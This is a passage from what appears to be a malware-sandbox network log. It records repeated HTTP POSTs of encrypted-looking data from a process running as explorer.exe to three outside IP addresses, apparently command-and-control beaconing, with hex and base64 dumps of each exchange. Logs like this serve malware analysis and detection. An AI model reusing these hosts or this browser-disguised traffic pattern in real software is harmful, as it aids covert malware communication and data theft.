                                                                              2024-07-27 12:55:18 UTC1122OUTData Raw: 45 68 69 68 73 63 55 56 33 47 65 72 36 4f 58 6a 30 50 43 58 6b 67 72 57 6c 43 77 50 39 61 44 46 57 45 34 4f 6b 67 74 44 78 69 45 57 4b 79 44 62 67 73 4c 59 64 52 65 4c 6a 4c 31 52 53 73 6b 6a 35 65 39 47 6d 65 72 52 30 56 61 77 68 68 44 36 68 47 64 43 34 33 58 4b 4b 46 6d 6a 39 6e 5a 4a 52 31 2b 5a 6a 30 48 61 30 33 41 6b 43 50 53 44 37 63 77 7a 76 77 4b 41 79 46 78 5a 78 51 7a 38 32 76 4e 61 4d 5a 69 79 59 2b 70 75 2f 43 71 77 56 58 6b 67 74 4b 2f 44 71 68 38 68 70 6e 61 6d 43 78 78 77 47 41 68 71 65 5a 54 58 4c 31 75 33 73 42 4e 6e 73 41 33 7a 6c 43 33 34 56 4b 65 46 32 44 33 47 74 7a 53 4e 57 4c 7a 2b 33 49 33 72 33 76 62 6f 2b 78 6c 67 67 37 4c 70 37 41 4e 46 33 61 71 2b 4b 59 31 76 54 46 38 64 43 66 46 4f 47 2f 4e 41 62 35 65 48 78 72 73 46 55 55 4c
                                                                              Data Ascii: EhihscUV3Ger6OXj0PCXkgrWlCwP9aDFWE4OkgtDxiEWKyDbgsLYdReLjL1RSskj5e9GmerR0VawhhD6hGdC43XKKFmj9nZJR1+Zj0Ha03AkCPSD7cwzvwKAyFxZxQz82vNaMZiyY+pu/CqwVXkgtK/Dqh8hpnamCxxwGAhqeZTXL1u3sBNnsA3zlC34VKeF2D3GtzSNWLz+3I3r3vbo+xlgg7Lp7ANF3aq+KY1vTF8dCfFOG/NAb5eHxrsFUUL
                                                                              2024-07-27 12:55:20 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:55:20 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:55:20 UTC685INData Raw: 74 2f 64 4b 50 46 51 4e 34 74 6c 65 45 67 63 59 65 41 2b 65 74 67 56 59 58 34 50 62 5a 46 76 37 46 43 62 4c 68 6d 69 57 4e 50 61 31 78 7a 74 2f 48 58 4e 34 32 4b 41 6f 4f 39 68 74 45 50 67 52 77 47 39 48 68 38 4a 6b 70 68 42 75 74 70 67 74 4c 79 31 6e 71 31 68 5a 4e 78 68 56 70 66 63 53 75 53 50 65 58 43 49 38 39 4c 79 32 2f 67 54 6f 77 33 71 55 4e 71 4c 56 55 62 73 73 6c 57 4a 4b 45 31 52 52 32 49 76 43 63 64 33 30 34 66 50 74 56 57 6d 30 6b 69 42 35 76 44 6b 69 5a 48 35 38 69 34 39 62 4b 4e 69 61 45 76 6e 6e 35 54 50 67 55 37 69 39 37 55 50 52 50 58 31 41 2b 78 46 79 33 2b 6e 73 45 49 39 37 54 33 4d 45 7a 4c 56 6f 50 71 30 42 54 54 65 46 38 38 32 33 77 6e 65 36 58 73 4f 36 30 6e 45 57 44 31 57 4a 58 39 44 77 63 74 54 39 35 54 52 7a 59 4c 71 41 69 77 4c
                                                                              Data Ascii: t/dKPFQN4tleEgcYeA+etgVYX4PbZFv7FCbLhmiWNPa1xzt/HXN42KAoO9htEPgRwG9Hh8JkphButpgtLy1nq1hZNxhVpfcSuSPeXCI89Ly2/gTow3qUNqLVUbsslWJKE1RR2IvCcd304fPtVWm0kiB5vDkiZH58i49bKNiaEvnn5TPgU7i97UPRPX1A+xFy3+nsEI97T3MEzLVoPq0BTTeF8823wne6XsO60nEWD1WJX9DwctT95TRzYLqAiwL


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              76192.168.2.449852167.235.128.1534432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:55:20 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 167.235.128.153
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:55:20 UTC1122OUTData Raw: 68 66 2f 70 5a 66 42 43 6c 73 55 78 6f 7a 2f 47 5a 63 4e 66 6a 65 72 76 6f 2b 45 67 66 65 4c 4e 76 50 4e 2b 74 72 62 42 33 6f 61 4e 65 2f 4e 6b 7a 30 30 7a 48 53 6e 68 43 6d 54 41 50 34 50 43 42 6c 6b 79 4f 69 70 66 71 45 4b 45 47 7a 50 64 57 38 7a 4b 37 51 41 74 2f 52 44 6c 53 75 45 56 6a 38 7a 52 65 74 70 6d 55 55 53 6e 45 64 62 7a 50 34 31 57 79 74 6d 65 50 56 32 55 78 46 57 56 4d 75 50 64 79 64 6f 55 42 34 50 67 32 2f 30 33 75 41 71 73 30 74 77 44 57 47 59 77 41 70 54 44 33 37 59 78 6c 79 6f 53 76 68 6e 2b 30 48 55 4d 75 47 6e 62 43 70 64 55 77 4d 75 73 61 68 74 6e 4a 41 58 55 7a 64 41 6b 42 44 34 69 4c 49 42 4e 50 54 4d 2f 56 75 64 72 7a 6d 41 69 76 7a 54 65 62 77 68 50 4e 65 67 71 64 5a 61 4c 73 47 72 66 72 32 46 69 79 73 39 32 57 39 72 76 63 35 76
                                                                              Data Ascii: hf/pZfBClsUxoz/GZcNfjervo+EgfeLNvPN+trbB3oaNe/Nkz00zHSnhCmTAP4PCBlkyOipfqEKEGzPdW8zK7QAt/RDlSuEVj8zRetpmUUSnEdbzP41WytmePV2UxFWVMuPdydoUB4Pg2/03uAqs0twDWGYwApTD37YxlyoSvhn+0HUMuGnbCpdUwMusahtnJAXUzdAkBD4iLIBNPTM/VudrzmAivzTebwhPNegqdZaLsGrfr2Fiys92W9rvc5v
                                                                              2024-07-27 12:55:21 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:55:21 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:55:21 UTC685INData Raw: 43 5a 75 79 79 52 56 37 66 65 44 6a 6d 71 64 6a 62 57 54 49 77 39 79 66 36 53 47 73 6b 6e 73 37 71 52 73 65 69 38 58 78 75 75 4a 43 68 37 31 4b 39 75 57 5a 42 4b 53 44 49 75 2b 43 4a 65 58 36 74 44 37 38 38 57 35 57 54 30 45 6d 51 68 75 4d 64 35 6a 70 7a 6d 67 6b 30 4b 4b 4a 61 66 64 79 4c 6b 77 53 6c 61 31 46 41 72 39 74 6c 4d 46 51 4a 53 6b 77 6f 4a 57 7a 6c 77 4b 35 44 68 45 4e 79 38 4d 67 49 6a 4d 64 46 72 67 72 75 69 65 35 55 46 79 69 48 57 41 2f 6a 42 43 78 66 46 38 31 36 33 31 62 43 4e 44 6d 75 79 6d 2b 79 31 52 30 41 70 35 38 77 57 6f 56 4f 39 7a 32 59 62 34 68 6d 2f 45 67 6b 59 65 32 34 51 42 75 42 6f 4a 55 72 76 5a 36 5a 56 6b 34 79 6c 48 36 43 74 33 46 61 2f 6b 4f 37 49 6e 64 78 4f 6f 34 6b 6d 49 7a 7a 62 66 4b 4b 4b 76 43 56 32 4a 4d 5a 56 52
                                                                              Data Ascii: CZuyyRV7feDjmqdjbWTIw9yf6SGskns7qRsei8XxuuJCh71K9uWZBKSDIu+CJeX6tD788W5WT0EmQhuMd5jpzmgk0KKJafdyLkwSla1FAr9tlMFQJSkwoJWzlwK5DhENy8MgIjMdFrgruie5UFyiHWA/jBCxfF81631bCNDmuym+y1R0Ap58wWoVO9z2Yb4hm/EgkYe24QBuBoJUrvZ6ZVk4ylH6Ct3Fa/kO7IndxOo4kmIzzbfKKKvCV2JMZVR


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              77192.168.2.449853107.173.160.1374432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:55:22 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.137
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1267
                                                                              2024-07-27 12:55:22 UTC1267OUTData Raw: 44 67 61 2b 6f 52 4c 41 36 47 57 65 49 73 42 54 34 76 34 4d 42 56 48 50 37 54 56 62 4f 71 45 52 47 56 6f 49 41 31 68 66 6a 6c 79 48 56 58 72 35 53 6e 66 4d 50 6f 73 45 32 43 38 32 6b 75 69 49 50 2b 39 54 42 61 51 33 63 6e 42 30 4b 76 58 77 46 5a 41 58 56 44 35 62 4b 73 4d 50 74 6f 6e 6c 6f 62 55 63 44 71 36 59 32 72 36 61 56 6d 5a 76 77 45 55 48 74 51 39 51 63 70 53 67 74 79 61 50 67 6f 6d 67 4d 7a 6d 72 49 72 53 52 4b 58 64 53 37 4f 76 55 58 49 65 37 46 69 45 6d 4a 74 68 75 4b 64 41 4c 68 36 4f 4c 63 73 34 46 59 62 42 55 41 54 2b 5a 59 54 52 32 66 6a 64 36 70 2f 78 63 30 43 77 38 37 51 4a 4c 43 79 51 6c 67 35 65 48 66 46 2b 31 42 4f 61 65 49 2b 53 70 50 56 43 4e 31 62 6a 38 39 50 4a 75 71 37 41 67 39 74 2f 67 50 4c 6b 68 49 43 53 38 35 75 76 6a 38 42 32
                                                                              Data Ascii: Dga+oRLA6GWeIsBT4v4MBVHP7TVbOqERGVoIA1hfjlyHVXr5SnfMPosE2C82kuiIP+9TBaQ3cnB0KvXwFZAXVD5bKsMPtonlobUcDq6Y2r6aVmZvwEUHtQ9QcpSgtyaPgomgMzmrIrSRKXdS7OvUXIe7FiEmJthuKdALh6OLcs4FYbBUAT+ZYTR2fjd6p/xc0Cw87QJLCyQlg5eHfF+1BOaeI+SpPVCN1bj89PJuq7Ag9t/gPLkhICS85uvj8B2
                                                                              2024-07-27 12:55:23 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:55:23 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:55:23 UTC685INData Raw: 68 52 38 41 67 64 73 45 4c 54 33 48 4e 42 78 2f 4c 33 55 32 50 75 64 34 71 62 42 7a 55 53 61 48 76 52 2b 72 47 33 78 79 70 78 6c 77 57 38 34 35 2f 46 73 37 35 6e 77 42 52 65 4f 2f 2b 41 39 73 72 4c 67 62 46 68 34 59 41 69 68 68 39 4d 47 50 36 41 6f 4b 68 62 5a 42 6d 43 38 49 6b 52 50 4c 71 75 33 74 33 6a 37 59 75 52 4d 64 54 64 2f 36 51 50 56 72 7a 61 5a 64 6a 32 72 68 61 54 4a 55 4d 74 4f 74 4d 41 48 79 6a 74 36 64 56 38 4e 2b 67 54 6e 41 30 73 49 30 78 68 36 43 71 78 49 2f 37 47 74 70 6d 76 77 55 35 4f 33 49 72 33 31 67 67 48 53 79 6a 61 32 72 4c 56 70 6d 32 39 38 56 7a 6c 53 4d 66 70 55 37 56 76 71 54 73 4c 69 67 31 63 43 7a 75 32 4b 46 56 30 57 5a 45 32 41 6a 37 4e 41 76 49 4d 6c 63 34 53 49 37 50 6d 6a 31 39 57 52 75 4d 62 75 65 78 7a 52 55 4e 73 66
                                                                              Data Ascii: hR8AgdsELT3HNBx/L3U2Pud4qbBzUSaHvR+rG3xypxlwW845/Fs75nwBReO/+A9srLgbFh4YAihh9MGP6AoKhbZBmC8IkRPLqu3t3j7YuRMdTd/6QPVrzaZdj2rhaTJUMtOtMAHyjt6dV8N+gTnA0sI0xh6CqxI/7GtpmvwU5O3Ir31ggHSyja2rLVpm298VzlSMfpU7VvqTsLig1cCzu2KFV0WZE2Aj7NAvIMlc4SI7Pmj19WRuMbuexzRUNsf


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              78192.168.2.449855107.173.160.1394432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:55:24 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.139
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:55:24 UTC1122OUTData Raw: 4d 76 76 2f 6a 35 6c 6c 74 35 6c 65 35 34 45 4c 6c 4c 4b 59 7a 6e 6d 4d 6b 49 46 66 4e 79 76 43 68 4e 71 2b 4a 46 74 38 34 5a 4c 38 7a 4c 62 64 79 76 32 54 61 49 56 50 42 39 2f 32 4d 31 6c 79 71 35 62 2b 4c 61 68 4b 42 59 4c 74 68 42 6e 61 48 59 32 46 6c 76 31 6d 65 4e 7a 68 6c 71 64 49 48 52 2f 6f 32 69 48 69 41 6a 50 2f 2f 62 7a 30 2f 6f 37 52 43 42 73 37 35 4d 36 6c 6e 45 51 48 42 4a 4b 39 42 35 6f 48 30 46 74 61 39 41 66 7a 7a 39 4b 55 4e 66 37 7a 76 77 79 56 7a 4b 37 6a 58 50 50 53 6b 69 6f 2f 37 74 35 48 6f 4a 57 79 59 5a 65 51 73 37 54 4b 55 2f 79 46 48 48 38 32 53 44 46 48 58 32 61 59 4c 2b 6d 42 75 71 41 47 73 4b 30 71 77 4a 4b 63 30 51 63 5a 6c 49 70 7a 51 76 2b 62 54 6b 52 58 36 76 41 4c 47 79 72 36 33 72 4b 62 55 63 48 31 43 57 65 4c 72 45 66
                                                                              Data Ascii: Mvv/j5llt5le54ELlLKYznmMkIFfNyvChNq+JFt84ZL8zLbdyv2TaIVPB9/2M1lyq5b+LahKBYLthBnaHY2Flv1meNzhlqdIHR/o2iHiAjP//bz0/o7RCBs75M6lnEQHBJK9B5oH0Fta9Afzz9KUNf7zvwyVzK7jXPPSkio/7t5HoJWyYZeQs7TKU/yFHH82SDFHX2aYL+mBuqAGsK0qwJKc0QcZlIpzQv+bTkRX6vALGyr63rKbUcH1CWeLrEf
                                                                              2024-07-27 12:55:25 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:55:25 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:55:25 UTC685INData Raw: 67 74 76 45 53 78 73 4d 46 59 6a 2b 48 75 34 31 4e 5a 6a 67 73 62 64 66 56 4a 7a 6c 73 64 7a 31 4f 37 4e 70 2b 4b 67 5a 75 45 39 2f 70 4c 78 5a 2b 2f 73 68 35 51 77 74 33 52 36 6a 59 63 42 72 49 49 66 6f 69 4d 71 5a 55 4b 6b 71 59 64 77 4f 51 56 45 4f 69 55 42 33 63 4f 6e 55 32 57 6a 65 76 6d 34 55 67 6b 50 54 35 4b 6e 65 57 76 77 4a 6c 54 6f 57 55 72 7a 56 4f 4f 37 38 59 38 36 6e 6b 58 43 44 32 76 39 32 32 58 46 5a 5a 71 74 30 65 73 50 50 4d 77 76 54 64 5a 6e 67 4c 50 39 48 31 57 59 6f 75 32 61 30 74 45 74 4d 6e 70 73 4b 78 42 76 4e 74 6b 62 53 32 75 6a 6e 51 76 48 68 79 6b 4a 71 2f 73 56 64 6e 61 2b 4c 74 70 35 4d 47 6d 53 73 66 56 4e 6e 52 77 76 6b 69 79 70 71 55 33 37 38 6d 78 31 36 6e 5a 70 69 42 42 66 4f 69 6e 70 70 55 65 30 6a 67 55 63 4f 57 75 62
                                                                              Data Ascii: gtvESxsMFYj+Hu41NZjgsbdfVJzlsdz1O7Np+KgZuE9/pLxZ+/sh5Qwt3R6jYcBrIIfoiMqZUKkqYdwOQVEOiUB3cOnU2Wjevm4UgkPT5KneWvwJlToWUrzVOO78Y86nkXCD2v922XFZZqt0esPPMwvTdZngLP9H1WYou2a0tEtMnpsKxBvNtkbS2ujnQvHhykJq/sVdna+Ltp5MGmSsfVNnRwvkiypqU378mx16nZpiBBfOinppUe0jgUcOWub


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              79192.168.2.449856167.235.128.1534432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:55:26 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 167.235.128.153
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:55:26 UTC1122OUTData Raw: 42 47 4f 6d 47 57 69 63 4e 51 57 59 35 37 78 7a 33 34 77 66 78 6e 67 78 68 45 54 4c 4d 78 74 46 61 59 2b 63 79 39 7a 71 5a 54 57 44 44 6a 45 32 48 50 39 61 43 6a 32 43 43 75 69 55 2b 47 4c 41 49 6b 79 37 2b 46 6e 42 44 6f 63 52 5a 47 58 7a 57 67 43 44 4f 4d 50 48 56 2f 77 59 46 4b 30 65 37 50 36 75 73 73 4a 77 57 33 39 42 47 4e 62 32 79 58 2b 4a 56 4a 6a 61 43 34 75 61 59 51 4a 33 32 77 5a 46 57 75 7a 76 61 4a 5a 75 39 7a 69 4c 4f 76 63 56 6d 5a 6c 32 78 44 36 4d 4f 53 2b 37 74 4d 2f 74 4f 50 68 6e 36 57 4c 43 38 58 44 4e 6a 62 63 65 68 6e 77 78 6f 78 34 76 72 71 39 69 5a 35 33 66 4c 6a 42 75 67 54 73 55 70 51 4c 74 48 71 59 62 31 48 36 57 6f 70 67 6e 65 66 43 6d 39 4a 6b 66 35 6d 6b 41 52 56 35 71 45 35 6a 2b 65 7a 53 44 45 46 78 6d 66 61 53 6e 35 30 6b
                                                                              Data Ascii: BGOmGWicNQWY57xz34wfxngxhETLMxtFaY+cy9zqZTWDDjE2HP9aCj2CCuiU+GLAIky7+FnBDocRZGXzWgCDOMPHV/wYFK0e7P6ussJwW39BGNb2yX+JVJjaC4uaYQJ32wZFWuzvaJZu9ziLOvcVmZl2xD6MOS+7tM/tOPhn6WLC8XDNjbcehnwxox4vrq9iZ53fLjBugTsUpQLtHqYb1H6WopgnefCm9Jkf5mkARV5qE5j+ezSDEFxmfaSn50k
                                                                              2024-07-27 12:55:27 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:55:27 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:55:27 UTC685INData Raw: 4e 4a 6b 51 76 4d 35 61 73 72 62 64 51 31 32 79 76 51 45 35 58 77 7a 2b 6e 43 50 54 4a 48 2f 55 52 46 34 79 50 78 6a 66 51 56 56 31 42 58 64 4d 64 6b 56 41 66 6d 54 72 63 57 79 73 37 6f 41 39 65 6e 45 36 39 44 45 51 4a 30 6f 7a 65 69 4e 33 68 4f 48 6c 31 57 61 63 36 58 50 61 4f 52 6f 50 75 73 67 37 47 4f 38 69 56 61 79 38 33 6a 2f 56 58 2f 6e 4e 58 6b 2f 49 39 66 56 53 4d 50 6d 4b 52 44 62 4e 44 42 30 61 68 58 56 5a 36 79 75 6c 31 2b 55 6d 74 42 62 62 34 48 79 45 38 52 38 37 6a 71 6b 33 74 6a 44 36 35 65 57 66 7a 34 53 65 5a 59 42 6d 4f 59 68 49 36 49 43 62 67 62 62 43 48 6e 2b 41 30 49 6b 44 72 4a 52 72 4e 47 64 35 4b 41 51 32 63 34 66 7a 41 72 55 4b 74 2f 33 6c 62 44 4c 4a 38 72 4b 59 57 51 71 4e 2b 48 4e 6a 4e 43 31 38 37 68 75 73 61 4f 41 69 46 77 67
                                                                              Data Ascii: NJkQvM5asrbdQ12yvQE5Xwz+nCPTJH/URF4yPxjfQVV1BXdMdkVAfmTrcWys7oA9enE69DEQJ0ozeiN3hOHl1Wac6XPaORoPusg7GO8iVay83j/VX/nNXk/I9fVSMPmKRDbNDB0ahXVZ6yul1+UmtBbb4HyE8R87jqk3tjD65eWfz4SeZYBmOYhI6ICbgbbCHn+A0IkDrJRrNGd5KAQ2c4fzArUKt/3lbDLJ8rKYWQqN+HNjNC187husaOAiFwg


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              80192.168.2.449857107.173.160.1374432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:55:28 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.137
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1267
                                                                              2024-07-27 12:55:28 UTC1267OUTData Raw: 4d 79 49 68 65 6b 6f 6c 7a 55 54 4c 68 4e 47 4a 36 7a 53 59 73 75 67 49 76 44 6c 69 38 44 30 6a 42 51 76 32 33 36 76 6e 34 61 61 36 35 61 49 6f 53 58 71 56 77 4d 58 2b 43 67 6b 57 68 56 6d 6d 53 30 49 30 4e 61 52 39 4e 38 38 78 73 50 48 2b 33 6d 69 4b 39 6b 55 7a 6a 6d 31 77 61 56 64 70 2f 74 61 30 78 52 2b 6d 71 71 35 74 77 6a 43 49 6d 75 2b 76 49 64 45 6f 70 55 38 54 44 62 78 73 6c 49 36 2b 4d 69 64 78 69 46 52 79 77 46 79 61 66 57 73 74 49 73 7a 72 71 48 4d 69 64 63 67 46 32 2b 59 5a 4a 72 7a 39 47 64 39 59 78 59 63 73 6d 58 5a 57 75 75 7a 42 42 51 73 6f 71 38 65 69 33 35 6a 6e 46 35 6e 41 61 77 4a 74 39 4f 51 70 75 50 41 34 52 75 45 58 65 33 73 68 4d 2f 6b 45 30 57 39 73 6b 53 74 33 6d 44 71 4e 70 64 61 6b 36 65 38 74 57 6b 52 49 67 36 2b 2f 69 69 4b
                                                                              Data Ascii: MyIhekolzUTLhNGJ6zSYsugIvDli8D0jBQv236vn4aa65aIoSXqVwMX+CgkWhVmmS0I0NaR9N88xsPH+3miK9kUzjm1waVdp/ta0xR+mqq5twjCImu+vIdEopU8TDbxslI6+MidxiFRywFyafWstIszrqHMidcgF2+YZJrz9Gd9YxYcsmXZWuuzBBQsoq8ei35jnF5nAawJt9OQpuPA4RuEXe3shM/kE0W9skSt3mDqNpdak6e8tWkRIg6+/iiK
                                                                              2024-07-27 12:55:29 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:55:29 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:55:29 UTC685INData Raw: 42 43 4d 71 6a 41 67 61 66 6c 4d 48 6e 32 52 59 39 65 4d 63 36 4e 2b 6b 42 41 77 63 73 6e 76 77 5a 66 31 64 53 63 39 41 77 72 49 52 49 64 77 77 76 6b 34 66 34 4b 37 53 71 36 36 5a 4f 36 42 31 6d 6e 63 41 76 78 32 63 63 4a 4a 74 34 36 54 52 4e 4d 30 7a 48 68 78 72 78 34 6b 61 67 55 32 4f 4f 62 7a 4e 38 33 39 7a 43 6f 62 6f 45 76 52 44 65 4d 6e 51 50 35 5a 50 65 51 77 70 33 7a 6f 4e 32 55 39 46 72 49 5a 6f 33 6a 6d 74 66 41 69 37 42 76 47 37 39 2b 35 2b 2f 41 62 59 76 73 65 33 64 61 6d 46 51 66 5a 76 4a 75 38 70 7a 72 76 73 76 4b 6b 43 64 48 78 2b 4a 6b 73 31 43 4c 31 4c 4e 34 56 72 71 6d 45 7a 46 76 6f 68 45 38 62 33 68 76 7a 53 4d 73 65 34 45 70 4f 42 59 46 54 6c 73 72 36 34 33 4e 53 75 6a 4c 65 62 69 4d 2b 61 49 62 63 65 6b 55 50 2b 61 61 6b 69 76 51 54
                                                                              Data Ascii: BCMqjAgaflMHn2RY9eMc6N+kBAwcsnvwZf1dSc9AwrIRIdwwvk4f4K7Sq66ZO6B1mncAvx2ccJJt46TRNM0zHhxrx4kagU2OObzN839zCoboEvRDeMnQP5ZPeQwp3zoN2U9FrIZo3jmtfAi7BvG79+5+/AbYvse3damFQfZvJu8pzrvsvKkCdHx+Jks1CL1LN4VrqmEzFvohE8b3hvzSMse4EpOBYFTlsr643NSujLebiM+aIbcekUP+aakivQT


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              81192.168.2.449859107.173.160.1394432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:55:30 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.139
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:55:30 UTC1122OUTData Raw: 43 76 4a 6b 44 38 5a 64 6d 42 63 4f 4d 59 59 78 6b 2b 56 30 6a 49 6a 2b 67 43 44 6e 69 37 65 58 77 73 32 67 78 49 64 2b 4d 48 54 56 4f 59 6c 4b 54 72 65 71 44 63 71 33 31 4f 75 38 33 73 48 66 57 65 44 50 39 39 4f 72 32 31 4b 4c 45 34 72 61 55 34 63 52 66 66 31 53 30 6d 31 4f 53 6c 6f 46 33 73 58 33 37 55 61 70 36 6c 77 69 55 55 39 67 34 76 79 2b 35 33 77 56 53 56 70 39 73 4c 5a 4d 72 46 45 30 64 42 6e 31 31 52 71 53 51 6d 4e 44 73 54 54 36 52 37 4d 38 4e 71 76 4d 32 58 56 66 74 4f 43 66 41 46 55 70 4c 6a 31 4a 71 73 32 4e 59 66 68 48 6c 54 4f 2b 67 43 44 6f 61 69 6b 69 38 42 2b 58 44 75 4f 62 71 4f 30 70 64 70 56 43 37 2f 4d 34 62 36 78 38 4f 37 6b 6a 37 5a 45 53 36 6a 77 4f 72 57 42 63 43 79 64 72 47 59 32 32 5a 76 79 44 35 48 53 57 5a 58 78 63 47 73 58
                                                                              Data Ascii: CvJkD8ZdmBcOMYYxk+V0jIj+gCDni7eXws2gxId+MHTVOYlKTreqDcq31Ou83sHfWeDP99Or21KLE4raU4cRff1S0m1OSloF3sX37Uap6lwiUU9g4vy+53wVSVp9sLZMrFE0dBn11RqSQmNDsTT6R7M8NqvM2XVftOCfAFUpLj1Jqs2NYfhHlTO+gCDoaiki8B+XDuObqO0pdpVC7/M4b6x8O7kj7ZES6jwOrWBcCydrGY22ZvyD5HSWZXxcGsX
                                                                              2024-07-27 12:55:31 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:55:31 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:55:31 UTC685INData Raw: 41 58 58 65 46 64 4a 68 31 42 53 74 77 66 68 61 47 75 56 49 79 56 42 59 72 59 4f 65 37 43 45 6d 6c 75 37 37 76 37 6f 41 31 70 5a 57 4c 6a 31 66 38 77 31 78 4d 37 50 55 2b 66 42 6e 35 53 6d 44 78 33 6f 6e 76 43 68 4e 65 39 6d 62 6a 6a 45 58 55 65 5a 72 65 42 63 65 52 76 35 4f 62 64 6a 39 53 53 6d 4d 49 38 2f 4c 34 68 73 46 32 6d 31 51 37 76 71 61 6e 63 43 48 69 74 42 70 51 78 41 38 75 58 68 69 52 43 37 67 7a 4d 6c 55 47 4e 46 6e 4b 49 66 57 55 35 72 4c 6d 59 4f 69 4e 4f 62 64 73 63 48 45 35 68 68 44 68 35 57 75 51 43 4e 37 7a 45 62 68 63 51 32 45 38 46 46 6a 63 36 53 35 48 59 30 6c 70 38 39 56 37 44 74 6a 30 33 6f 2f 45 48 47 35 79 31 4a 62 6e 6f 54 47 67 69 6f 34 78 30 66 72 7a 2b 4a 62 7a 48 6f 6c 36 58 64 62 39 55 6e 36 76 53 64 78 2f 59 44 46 4f 53 32
                                                                              Data Ascii: AXXeFdJh1BStwfhaGuVIyVBYrYOe7CEmlu77v7oA1pZWLj1f8w1xM7PU+fBn5SmDx3onvChNe9mbjjEXUeZreBceRv5Obdj9SSmMI8/L4hsF2m1Q7vqancCHitBpQxA8uXhiRC7gzMlUGNFnKIfWU5rLmYOiNObdscHE5hhDh5WuQCN7zEbhcQ2E8FFjc6S5HY0lp89V7Dtj03o/EHG5y1JbnoTGgio4x0frz+JbzHol6Xdb9Un6vSdx/YDFOS2


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              82192.168.2.449860167.235.128.1534432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:55:32 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 167.235.128.153
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
